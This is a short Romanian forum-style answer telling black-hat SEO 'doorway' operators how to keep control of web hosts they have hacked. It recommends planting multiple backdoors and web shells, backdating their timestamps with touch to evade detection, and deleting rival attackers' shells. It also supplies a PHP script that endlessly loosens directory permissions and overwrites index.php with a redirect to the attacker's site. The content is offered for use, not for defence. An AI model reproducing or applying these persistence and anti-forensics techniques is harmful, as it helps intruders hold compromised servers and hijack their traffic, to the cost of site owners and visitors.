Rezolvare: Dacă tu faci doorway pe host, hack-uit prin Public Vulnerability pe motorul instalat acolo, atunci poti închide catalogul cu acel motor cu ajutorul chmod, modifică parola hash a administratorului în ceva de genul acesta haha&_$#@%. Dar de obicei aceasta puţin ce ajută, şi doorway-erii întîlnesc problema furtului doorway-urilor post factum, de aceea ţine minte următoarea regulă: pentru ca mai uşor să îţi poţi intoarce doorway-ul, lasă cîte mai multe backdoor-uri şi Shell-uri pe hostul hack-uit, însă cu toate acestea nu uita timpul de modificare a fişierelor prin comanda touch -t AnLunăZiOrăMinuteSecunde shell.php. Dupa furtul de doorway primul lucru care trebuie să îl faci este să găseşti şi să ştergi Shell-urile persoanelor nedorite ( aceasta se poate de facut cu ajutorul comenzii find - -mtime -60-grep.php ), apoi schimbă readresarea către shell-ul tău şi protejazăte cu ajutorul următorului scenariu-php:
Cod: |
<_?php ignore_user_abort(true); set_time_limit(0); while (!is_file('stop.dat')) { @chmod('/var/www/html/catalog',0777); $textht='<_?php header("Location: http://shell-ul_tău.com"); ?>'; $fp = @fopen("/var/www/html/catalog/index.php","w"); @flock ($fp, LOCK_EX); @fput ($fp, $textht); @flock ($fp, LOCK_UN); @fclose ($fp); sleep(5); } ?_> P.S. Linia _ din cod se elimina |